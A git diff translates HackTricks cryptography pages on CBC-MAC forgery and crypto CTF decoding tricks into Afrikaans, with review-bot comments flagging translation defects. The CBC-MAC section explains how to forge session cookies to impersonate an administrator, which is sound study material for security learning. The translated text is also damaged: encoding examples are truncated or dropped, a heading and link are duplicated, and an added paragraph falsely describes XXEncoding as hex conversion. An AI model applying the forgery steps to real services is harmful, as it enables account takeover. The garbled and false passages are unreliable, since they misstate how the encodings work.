diff --git a/cryptography/cipher-block-chaining-cbc-mac-priv.md b/cryptography/cipher-block-chaining-cbc-mac-priv.md index bbe30b004..78fe25614 100644 --- a/cryptography/cipher-block-chaining-cbc-mac-priv.md +++ b/cryptography/cipher-block-chaining-cbc-mac-priv.md @@ -1,85 +1,81 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
# CBC -If the **cookie** is **only** the **username** (or the first part of the cookie is the username) and you want to impersonate the username "**admin**". Then, you can create the username **"bdmin"** and **bruteforce** the **first byte** of the cookie. +As die **koekie** **slegs** die **gebruikersnaam** is (of die eerste deel van die koekie is die gebruikersnaam) en jy wil die gebruikersnaam "**admin**" naboots. Dan kan jy die gebruikersnaam **"bdmin"** skep en die **eerste byte** van die koekie **brute force**. # CBC-MAC -**Cipher block chaining message authentication code** (**CBC-MAC**) is a method used in cryptography. It works by taking a message and encrypting it block by block, where each block's encryption is linked to the one before it. This process creates a **chain of blocks**, making sure that changing even a single bit of the original message will lead to an unpredictable change in the last block of encrypted data. To make or reverse such a change, the encryption key is required, ensuring security. +**Cipher block chaining message authentication code** (**CBC-MAC**) is 'n metode wat in kriptografie gebruik word. Dit werk deur 'n boodskap blok vir blok te versleutel, waar elke blok se versleuteling gekoppel is aan die een voor dit. Hierdie proses skep 'n **ketting van blokke**, wat verseker dat selfs 'n enkele bit van die oorspronklike boodskap 'n onvoorspelbare verandering in die laaste blok van versleutelde data sal veroorsaak. Om so 'n verandering te maak of ongedaan te maak, is die versleutelingssleutel nodig, wat sekuriteit verseker. -To calculate the CBC-MAC of message m, one encrypts m in CBC mode with zero initialization vector and keeps the last block. 
The following figure sketches the computation of the CBC-MAC of a message comprising blocks![https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) using a secret key k and a block cipher E: +Om die CBC-MAC van 'n boodskap m te bereken, word m in CBC-modus met 'n nul-inisialisasievektor versleutel en die laaste blok behou. Die volgende figuur skets die berekening van die CBC-MAC van 'n boodskap wat uit blokke bestaan![https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) deur 'n geheime sleutel k en 'n blokversleuteling E: ![https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png) -# Vulnerability +# Kwesbaarheid -With CBC-MAC usually the **IV used is 0**.\ -This is a problem because 2 known messages (`m1` and `m2`) independently will generate 2 signatures (`s1` and `s2`). So: +Met CBC-MAC word die **IV wat gebruik word, gewoonlik as 0** gestel.\ +Dit is 'n probleem omdat 2 bekende boodskappe (`m1` en `m2`) onafhanklik 2 handtekeninge (`s1` en `s2`) sal genereer. 
So: * `E(m1 XOR 0) = s1` * `E(m2 XOR 0) = s2` -Then a message composed by m1 and m2 concatenated (m3) will generate 2 signatures (s31 and s32): +Dan sal 'n boodskap wat bestaan uit m1 en m2 gekombineer (m3) 2 handtekeninge genereer (s31 en s32): * `E(m1 XOR 0) = s31 = s1` * `E(m2 XOR s1) = s32` -**Which is possible to calculate without knowing the key of the encryption.** +**Dit is moontlik om dit te bereken sonder om die versleutelingssleutel te ken.** -Imagine you are encrypting the name **Administrator** in **8bytes** blocks: +Stel jou voor jy versleutel die naam **Administrator** in blokke van **8 byte**: * `Administ` * `rator\00\00\00` -You can create a username called **Administ** (m1) and retrieve the signature (s1).\ -Then, you can create a username called the result of `rator\00\00\00 XOR s1`. This will generate `E(m2 XOR s1 XOR 0)` which is s32.\ -now, you can use s32 as the signature of the full name **Administrator**. +Jy kan 'n gebruikersnaam skep met die naam **Administ** (m1) en die handtekening (s1) daarvan bekom.\ +Dan kan jy 'n gebruikersnaam skep met die resultaat van `rator\00\00\00 XOR s1`. Dit sal `E(m2 XOR s1 XOR 0)` genereer, wat s32 is.\ +Nou kan jy s32 gebruik as die handtekening van die volledige naam **Administrator**. -### Summary +### Opsomming -1. Get the signature of username **Administ** (m1) which is s1 -2. Get the signature of username **rator\x00\x00\x00 XOR s1 XOR 0** is s32**.** -3. Set the cookie to s32 and it will be a valid cookie for the user **Administrator**. +1. Kry die handtekening van die gebruikersnaam **Administ** (m1), wat s1 is. +2. Kry die handtekening van die gebruikersnaam **rator\x00\x00\x00 XOR s1 XOR 0**, wat s32 is. +3. Stel die koekie in as s32 en dit sal 'n geldige koekie wees vir die gebruiker **Administrator**. 
-# Attack Controlling IV +# Aanval deur IV te beheer -If you can control the used IV the attack could be very easy.\ -If the cookies is just the username encrypted, to impersonate the user "**administrator**" you can create the user "**Administrator**" and you will get it's cookie.\ -Now, if you can control the IV, you can change the first Byte of the IV so **IV\[0] XOR "A" == IV'\[0] XOR "a"** and regenerate the cookie for the user **Administrator.** This cookie will be valid to **impersonate** the user **administrator** with the initial **IV**. +As jy die gebruikte IV kan beheer, kan die aanval baie maklik wees.\ +As die koekies net die versleutelde gebruikersnaam is, kan jy die gebruiker "**administrator**" naboots deur die gebruiker "**Administrator**" te skep en sy koekie te kry.\ +Nou, as jy die IV kan beheer, kan jy die eerste byte van die IV verander sodat **IV\[0] XOR "A" == IV'\[0] XOR "a"** en die koekie vir die gebruiker **Administrator** hergenereer. Hierdie koekie sal geldig wees om die gebruiker **administrator** met die oorspronklike **IV** na te boots. -## References +## Verwysings -More information in [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC) +Meer inligting in [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
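Review bot: the conditional in the translated "# CBC" paragraph is left as a fragment: "As die koekie slegs die gebruikersnaam is (...) en jy wil die gebruikersnaam "admin" naboots. Dan kan jy ..." should be one sentence ("... naboots, dan kan jy die gebruikersnaam "bdmin" skep ..."); the English source's broken sentence does not need to be carried over. In the CBC-MAC paragraph the formula image is still glued to the preceding word ("uit blokke bestaan![https://wikimedia.org/...") so it renders as an inline image with no separating space; insert a space before the `!`. The shared footer also renders "github repos" three different ways in this PR: "GitHub-opslagplekke" here, "github-repos" in crypto-ctfs-tricks.md and "github-opslag" in electronic-code-book-ecb.md; pick one term for the footer text that every page repeats.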
- - diff --git a/cryptography/crypto-ctfs-tricks.md b/cryptography/crypto-ctfs-tricks.md index 080613c70..406d8f58c 100644 --- a/cryptography/crypto-ctfs-tricks.md +++ b/cryptography/crypto-ctfs-tricks.md @@ -1,22 +1,22 @@ -# Crypto CTFs Tricks +# Crypto CTFs Truuks
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Online Hashes DBs +## Aanlyn Hash-databasisse -* _**Google it**_ +* _**Google dit**_ * [http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240](http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240) * [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com) * [https://crackstation.net/](https://crackstation.net) @@ -28,26 +28,26 @@ Other ways to support HackTricks: * [https://hashkiller.co.uk/Cracker/MD5](https://hashkiller.co.uk/Cracker/MD5) * [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html) -## Magic Autosolvers +## Toveroplossers * [**https://github.com/Ciphey/Ciphey**](https://github.com/Ciphey/Ciphey) -* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) (Magic module) +* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) (Magic-module) * [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) * [https://www.boxentriq.com/code-breaking](https://www.boxentriq.com/code-breaking) -## Encoders +## Enkoders -Most of encoded data can be decoded with these 2 ressources: +Die meeste gekodeerde data kan ontsluit word met hierdie 2 hulpbronne: * [https://www.dcode.fr/tools-list](https://www.dcode.fr/tools-list) * [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) -### Substitution Autosolvers +### Substitusie Toveroplossers * [https://www.boxentriq.com/code-breaking/cryptogram](https://www.boxentriq.com/code-breaking/cryptogram) -* [https://quipqiup.com/](https://quipqiup.com) - Very good ! +* [https://quipqiup.com/](https://quipqiup.com) - Baie goed! -#### Caesar - ROTx Autosolvers +#### Caesar - ROTx Toveroplossers * [https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript](https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript) 
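Review bot: "Autosolver" is rendered as "Toveroplossers" in this hunk ("## Toveroplossers", "### Substitusie Toveroplossers", "#### Caesar - ROTx Toveroplossers") but as "Outomatiese oplosser" later in the same file ("### XOR - Outomatiese oplosser"); "Outomatiese oplossers" keeps the meaning of the English ("automatic solvers") and should be used in all of these headings. Leaving "Magic" untranslated in "(Magic-module)" is right, since that is the name of a CyberChef feature.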
@@ -55,97 +55,89 @@ Most of encoded data can be decoded with these 2 ressources: * [http://rumkin.com/tools/cipher/atbash.php](http://rumkin.com/tools/cipher/atbash.php) -### Base Encodings Autosolver +### Basisenkoderings Toveroplossers -Check all these bases with: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) +Kyk na al hierdie basisse met: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) * **Ascii85** - * `BQ%]q@psCd@rH0l` +* `BQ%]q@psCd@rH0l` * **Base26** \[_A-Z_] - * `BQEKGAHRJKHQMVZGKUXNT` +* `BQEKGAHRJKHQMVZGKUXNT` * **Base32** \[_A-Z2-7=_] - * `NBXWYYLDMFZGCY3PNRQQ====` +* `NBXWYYLDMFZGCY3PNRQQ====` * **Zbase32** \[_ybndrfg8ejkmcpqxot1uwisza345h769_] - * `pbzsaamdcf3gna5xptoo====` +* `pbzsaamdcf3gna5xptoo====` * **Base32 Geohash** \[_0-9b-hjkmnp-z_] - * `e1rqssc3d5t62svgejhh====` +* `e1rqssc3d5t62svgejhh====` * **Base32 Crockford** \[_0-9A-HJKMNP-TV-Z_] - * `D1QPRRB3C5S62RVFDHGG====` +* `D1QPRRB3C5S62RVFDHGG====` * **Base32 Extended Hexadecimal** \[_0-9A-V_] - * `D1NMOOB3C5P62ORFDHGG====` +* `D1NMOOB3C5P62ORFDHGG====` * **Base45** \[_0-9A-Z $%\*+-./:_] - * `59DPVDGPCVKEUPCPVD` +* `59DPVDGPCVKEUPCPVD` * **Base58 (bitcoin)** \[_1-9A-HJ-NP-Za-km-z_] - * `2yJiRg5BF9gmsU6AC` +* `2yJiRg5BF9gmsU6AC` * **Base58 (flickr)** \[_1-9a-km-zA-HJ-NP-Z_] - * `2YiHqF5bf9FLSt6ac` +* `2YiHqF5bf9FLSt6ac` * **Base58 (ripple)** \[_rpshnaf39wBUDNEGHJKLM4PQ-T7V-Z2b-eCg65jkm8oFqi1tuvAxyz_] - * `pyJ5RgnBE9gm17awU` +* `pyJ5RgnBE9gm17awU` * **Base62** \[_0-9A-Za-z_] - * `g2AextRZpBKRBzQ9` +* `g2AextRZpBKRBzQ9` * **Base64** \[_A-Za-z0-9+/=_] - * `aG9sYWNhcmFjb2xh` +* `aG9sYWNhcmFjb2xh` * **Base67** \[_A-Za-z0-9-_.!\~\_] - * `NI9JKX0cSUdqhr!p` +* `NI9JKX0cSUdqhr!p` * **Base85 (Ascii85)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_] - * `BQ%]q@psCd@rH0l` +* `BQ%]q@psCd@rH0l` * **Base85 (Adobe)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_] - * `<~BQ%]q@psCd@rH0l~>` +* `<~BQ%]q@psCd@rH0l~>` * **Base85 (IPv6 or 
RFC1924)** \[_0-9A-Za-z!#$%&()\*+-;<=>?@^_\`{|}\~\_] - * `Xm4y`V\_|Y(V{dF>\` +* `Xm4y`V\_|Y(V{dF>\` * **Base85 (xbtoa)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_] - * `xbtoa Begin\nBQ%]q@psCd@rH0l\nxbtoa End N 12 c E 1a S 4e6 R 6991d` +* `xbtoa Begin\nBQ%]q@psCd@rH0l\nxbtoa End N 12 c E 1a S 4e6 R 6991d` * **Base85 (XML)** \[_0-9A-Za-y!#$()\*+,-./:;=?@^\`{|}\~z\__] - * `Xm4y|V{~Y+V}dF?` +* `Xm4y|V{~Y+V}dF?` * **Base91** \[_A-Za-z0-9!#$%&()\*+,./:;<=>?@\[]^\_\`{|}\~"_] - * `frDg[*jNN!7&BQM` +* `frDg[*jNN!7&BQM` * **Base100** \[] - * `👟👦👣👘👚👘👩👘👚👦👣👘` +* `👟👦👣👘👚👘👩👘👚👦👣👘` * **Base122** \[] - * `4F ˂r0Xmvc` -* **ATOM-128** \[_/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC_] - * `MIc3KiXa+Ihz+lrXMIc3KbCC` -* **HAZZ15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_] - * `DmPsv8J7qrlKEoY7` +* `4F +* `DmPsv8J7qrlKEoY7` * **MEGAN35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_] - * `kLD8iwKsigSalLJ5` +* `kLD8iwKsigSalLJ5` * **ZONG22** \[_ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2_] - * `ayRiIo1gpO+uUc7g` +* `ayRiIo1gpO+uUc7g` * **ESAB46** \[] - * `3sHcL2NR8WrT7mhR` +* `3sHcL2NR8WrT7mhR` * **MEGAN45** \[] - * `kLD8igSXm2KZlwrX` +* `kLD8igSXm2KZlwrX` * **TIGO3FX** \[] - * `7AP9mIzdmltYmIP9mWXX` +* `7AP9mIzdmltYmIP9mWXX` * **TRIPO5** \[] - * `UE9vSbnBW6psVzxB` +* `UE9vSbnBW6psVzxB` * **FERON74** \[] - * `PbGkNudxCzaKBm0x` +* `PbGkNudxCzaKBm0x` * **GILA7** \[] - * `D+nkv8C1qIKMErY1` +* `D+nkv8C1qIKMErY1` * **Citrix CTX1** \[] - * `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK` +* `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK` -[http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) 
+[http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html) - 404 Dood: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) ### HackerizeXS \[_╫Λ↻├☰┏_] - ``` ╫☐↑Λ↻Λ┏Λ↻☐↑Λ ``` - -* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) +* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 Dood: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) ### Morse - ``` .... --- .-.. -.-. .- .-. .- -.-. --- .-.. .- ``` - -* [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html) - 404 Dead: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) +* [http://k4.cba.pl/dw/crypo/tools/af\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/af\_morse-encode.html) - 404 Dood: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) ### UUencoder - ``` begin 644 webutils_pl M2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%( 
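Review bot: this hunk loses content from the base-encodings list. The Base122 example `4F ˂r0Xmvc` is truncated to `4F` with its closing backtick missing (which breaks rendering of the rest of the list), and the ATOM-128 and HAZZ15 entries (their alphabets and the example `MIc3KiXa+Ihz+lrXMIc3KbCC`) are removed entirely, leaving the HAZZ15 example `DmPsv8J7qrlKEoY7` orphaned under Base122; restore those four lines. Every example line also loses its two-space indentation, so the examples are no longer nested under the encoding name they illustrate; keep the nesting. The Morse link is rewritten from `eng\_morse-encode.html` to `af\_morse-encode.html`, which changes a third-party URL that a translation should leave untouched.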
@@ -154,129 +146,117 @@ F3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$$` ` end ``` - * [http://www.webutils.pl/index.php?idx=uu](http://www.webutils.pl/index.php?idx=uu) -### XXEncoder +### XXKoder +XXEncoder is a simple encoding technique that converts ASCII characters to their hexadecimal representation. It is commonly used to obfuscate data or bypass certain security measures. To decode the encoded data, you can use an online XXDecoder tool or write a custom script. Keep in mind that XXEncoder is a basic encoding method and may not provide strong security. ``` begin 644 webutils_pl hG2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236 5Hol-G2xAEE++ end ``` - * [www.webutils.pl/index.php?idx=xx](https://github.com/carlospolop/hacktricks/tree/bf578e4c5a955b4f6cdbe67eb4a543e16a3f848d/crypto/www.webutils.pl/index.php?idx=xx) ### YEncoder +* [www.webutils.pl/index.php?idx=xx](https://github.com/carlospolop/hacktricks/tree/bf578e4c5a955b4f6cdbe67eb4a543e16a3f848d/crypto/www.webutils.pl/index.php?idx=xx) + +### YEncoder ``` =ybegin line=128 size=28 name=webutils_pl ryvkryvkryvkryvkryvkryvkryvk =yend size=28 crc32=35834c86 ``` - * [http://www.webutils.pl/index.php?idx=yenc](http://www.webutils.pl/index.php?idx=yenc) ### BinHex +BinHex is 'n formaat wat gebruik word om binêre lêers te vertaal na 'n teksformaat wat veilig oorgedra kan word. Dit word dikwels gebruik om lêers te omskep vir oordrag oor e-pos of ander kommunikasiekanale wat slegs teks ondersteun. BinHex gebruik 'n spesiale algoritme om die binêre data om te skakel na 'n reeks ASCII-karakters. Hierdie omgesette teks kan dan veilig oorgedra word sonder om data te verloor of te beskadig. BinHex is 'n nuttige hulpmiddel vir die oordra van binêre lêers in 'n veilige en betroubare formaat. 
``` (This file must be converted with BinHex 4.0) :#hGPBR9dD@acAh"X!$mr2cmr2cmr!!!!!!!8!!!!!-ka5%p-38K26%&)6da"5%p -38K26%'d9J!!: ``` - * [http://www.webutils.pl/index.php?idx=binhex](http://www.webutils.pl/index.php?idx=binhex) ### ASCII85 +ASCII85 is 'n binêre na teks-koderingsalgoritme wat gebruik word om binêre data om te skakel na 'n teksvorm wat bestaan uit ASCII-karakters. Dit is nuttig vir die oordra van binêre data in 'n teksgebaseerde omgewing, soos e-pos of tekslêers. ASCII85 kodeer elke 4 byte van binêre data na 5 ASCII-karakters. ``` <~85DoF85DoF85DoF85DoF85DoF85DoF~> ``` - * [http://www.webutils.pl/index.php?idx=ascii85](http://www.webutils.pl/index.php?idx=ascii85) -### Dvorak keyboard - +### Dvorak sleutelbord ``` drnajapajrna ``` - -* [https://www.geocachingtoolbox.com/index.php?lang=en\&page=dvorakKeyboard](https://www.geocachingtoolbox.com/index.php?lang=en\&page=dvorakKeyboard) +* [https://www.geocachingtoolbox.com/index.php?lang=af\&page=dvorakKeyboard](https://www.geocachingtoolbox.com/index.php?lang=af\&page=dvorakKeyboard) ### A1Z26 -Letters to their numerical value - +Briewe na hul numeriese waarde ``` 8 15 12 1 3 1 18 1 3 15 12 1 ``` - ### Affine Cipher Encode -Letter to num `(ax+b)%26` (_a_ and _b_ are the keys and _x_ is the letter) and the result back to letter - +Letter na nommer `(ax+b)%26` (_a_ en _b_ is die sleutels en _x_ is die letter) en die resultaat terug na 'n letter. ``` krodfdudfrod ``` +### SMS Kode -### SMS Code +**Multitap** [vervang 'n letter](https://www.dcode.fr/word-letter-change) deur herhaalde syfers wat gedefinieer word deur die ooreenstemmende sleutelkode op 'n mobiele [foon sleutelbord](https://www.dcode.fr/phone-keypad-cipher) (Hierdie modus word gebruik wanneer SMS'e geskryf word).\ +Byvoorbeeld: 2=A, 22=B, 222=C, 3=D...\ +Jy kan hierdie kode identifiseer omdat jy\*\* verskeie herhaalde syfers\*\* sal sien. 
-**Multitap** [replaces a letter](https://www.dcode.fr/word-letter-change) by repeated digits defined by the corresponding key code on a mobile [phone keypad](https://www.dcode.fr/phone-keypad-cipher) (This mode is used when writing SMS).\ -For example: 2=A, 22=B, 222=C, 3=D...\ -You can identify this code because you will see\*\* several numbers repeated\*\*. +Jy kan hierdie kode ontsyfer by: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher) -You can decode this code in: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher) - -### Bacon Code - -Substitude each letter for 4 As or Bs (or 1s and 0s) +### Bacon Kode +Vervang elke letter met 4 As of Bs (of 1s en 0s) ``` 00111 01101 01010 00000 00010 00000 10000 00000 00010 01101 01010 00000 AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA ``` - -### Runes +### Rune ![](../.gitbook/assets/runes.jpg) -## Compression +## Saamdruk -**Raw Deflate** and **Raw Inflate** (you can find both in Cyberchef) can compress and decompress data without headers. +**Raw Deflate** en **Raw Inflate** (jy kan beide in Cyberchef vind) kan data saamdruk en ontspan sonder koppe. 
-## Easy Crypto +## Maklike Kriptografie -### XOR - Autosolver +### XOR - Outomatiese oplosser * [https://wiremask.eu/tools/xor-cracker/](https://wiremask.eu/tools/xor-cracker/) ### Bifid -A keywork is needed - +'n Sleutelwoord is nodig ``` fgaargaamnlunesuneoa ``` - ### Vigenere -A keywork is needed - +'n Sleutelwoord is nodig ``` wodsyoidrods ``` - * [https://www.guballa.de/vigenere-solver](https://www.guballa.de/vigenere-solver) * [https://www.dcode.fr/vigenere-cipher](https://www.dcode.fr/vigenere-cipher) * [https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx](https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx) -## Strong Crypto +## Sterk Kriptografie ### Fernet -2 base64 strings (token and key) - +2 basis64 strings (token en sleutel) ``` Token: gAAAAABWC9P7-9RsxTz_dwxh9-O2VUB7Ih8UCQL1_Zk4suxnkCvb26Ie4i8HSUJ4caHZuiNtjLl3qfmCv_fS3_VpjL7HxCz7_Q== @@ -284,19 +264,16 @@ gAAAAABWC9P7-9RsxTz_dwxh9-O2VUB7Ih8UCQL1_Zk4suxnkCvb26Ie4i8HSUJ4caHZuiNtjLl3qfmC Key: -s6eI5hyNh8liH7Gq0urPC-vzPgNnxauKvRO4g03oYI= ``` - * [https://asecuritysite.com/encryption/ferdecode](https://asecuritysite.com/encryption/ferdecode) -### Samir Secret Sharing - -A secret is splitted in X parts and to recover it you need Y parts (_Y <=X_). +### Samir Geheime Deling +'n Geheim word in X dele verdeel en om dit te herstel, het jy Y dele nodig (_Y <=X_). ``` 8019f8fa5879aa3e07858d08308dc1a8b45 80223035713295bddf0b0bd1b10a5340b89 803bc8cf294b3f83d88e86d9818792e80cd ``` - [http://christian.gen.co/secrets/](http://christian.gen.co/secrets/) ### OpenSSL brute-force 
